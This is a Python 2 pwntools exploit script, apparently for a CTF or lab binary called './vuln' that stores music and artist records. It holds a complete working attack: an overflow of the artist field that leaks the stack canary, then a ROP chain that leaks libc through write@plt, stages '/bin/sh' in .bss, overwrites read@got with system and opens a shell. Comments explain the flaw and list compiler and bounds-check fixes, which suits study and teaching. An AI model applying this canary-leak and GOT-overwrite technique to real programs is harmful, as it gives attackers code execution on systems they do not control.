exploit.py


from pwn import *

  

# Python 2 pwntools script (print statements, str/bytes mixing): it will not run
# unmodified under Python 3.
#
# What the script relies on, and the corresponding defensive fixes:
#   - the "artist" field is copied into a stack buffer without a length check,
#     so a 20-byte fill reaches the stack canary and a longer one reaches the
#     saved return address -> bounds-check every copy into the record;
#   - the program echoes the record back (menu option 2), so bytes written past
#     the terminating NUL leak the canary -> NUL-terminate / length-limit output;
#   - read@got is overwritten, i.e. the GOT is assumed writable (no full RELRO),
#     and 0x080495ad / PLT addresses are fixed (non-PIE) -> link with
#     -Wl,-z,relro,-z,now and build with -fPIE.
# Detection angle: a client that submits >20-byte artist strings and then
# immediately requests the listing is the observable pattern of the leak.

# Local target process and its ELF; l is the libc pwntools resolves for it.
p = process("./vuln")

e = ELF("./vuln")

l = e.libc


# Banner, then the user name the program asks for first.
print p.recvuntil("\n")

p.sendline("youngsin")

# Create 99 entries with menu option 1 (music "A", artist "B").
# presumably needed so that record numbers 99 and 100 exist for the edits
# below -- confirm against the binary's menu logic.
for i in range(1,100):

    print p.sendlineafter("\tselect\t|\t\n","1")

    print p.sendlineafter("music\t|\t","A")

    print p.sendlineafter("\tartist\t|\t","B")


# Menu option 3 edits an existing record. Entry 100 gets the canary-leak
# input: 16 'F' + "12345" is 21 bytes, and sendafter() adds no newline, so
# the last byte lands on the canary's low (NUL) byte; the marker "12345"
# is what we search for in the echoed output.
for i in range(99,101):

    print p.sendlineafter("\tselect\t|\t\n","3")

    print p.sendlineafter("select number\t|\t\n",str(i))

    print p.sendlineafter("music\t|\t","A"*19)


    if i==100:

        print p.sendafter("artist\t|\t","F"*16+"12345")

    else:

        print p.sendlineafter("artist\t|\t","B"*24)


# Menu option 2 prints the records; the echo runs past the overwritten NUL.
print p.sendlineafter("\tselect\t|\t\n","2")

print p.recvuntil("12345")


# Rebuild the 4-byte canary: the script assumes its low byte was 0x00 (the
# byte the "5" clobbered) and takes the remaining three bytes from the echo.
canary = "\x00"+p.recv(3)

# Hard-coded gadget address for this build of ./vuln. It is used as the
# return address after every three-argument call below, so it must pop three
# words and return.
pppr = 0x080495ad

binsh = "/bin/sh\x00"


# Stack layout implied by the leak above: 20 bytes to the canary, then the
# canary itself, then 12 more bytes before the saved return address.
payload = "A"*20

payload += canary

payload += "A"*12


# 1. write(1, read@got, 4): leak the resolved libc address of read().
payload += p32(e.plt['write'])

payload += p32(pppr)

payload += p32(1)

payload += p32(e.got['read'])

payload += p32(4)


# 2. read(0, .bss, len(binsh)): stage "/bin/sh\0" in writable memory.
payload += p32(e.plt['read'])

payload += p32(pppr)

payload += p32(0)

payload += p32(e.bss())

payload += p32(len(binsh))


# 3. read(0, read@got, 4): replace read's GOT entry with the value sent later.
payload += p32(e.plt['read'])

payload += p32(pppr)

payload += p32(0)

payload += p32(e.got['read'])

payload += p32(4)


# 4. Call read@plt once more; after step 3 it resolves to whatever was written
# into the GOT, with .bss as the single argument. The 4 filler bytes are a
# return address that is never used.
payload += p32(e.plt['read'])

payload += "A"*4

payload += p32(e.bss())


# Edit entry 100 again with the full payload as the artist string (sendafter:
# no trailing newline), then menu option 4 exits, which returns into the chain.
print p.sendlineafter("\tselect\t|\t\n","3")

print p.sendlineafter("select number\t|\t\n","100")

print p.sendlineafter("music\t|\t","A"*19)

print p.sendafter("artist\t|\t",payload)

print p.sendlineafter("\tselect\t|\t\n","4")

print p.recvuntil("BYE\n\n")



# Output of step 1: ljust() pads in case recv(4) returns fewer than 4 bytes.
read_addr = u32(p.recv(4).ljust(4,"\x00"))

libc_base = read_addr - l.symbols['read']

system_addr = libc_base + l.symbols['system']


# Input for step 2, then for step 3. Note that sendline() appends "\n" beyond
# the 4 bytes step 3 consumes; the extra byte is left on stdin for step 4.
p.send(binsh)

p.sendline(p32(system_addr))

p.interactive()

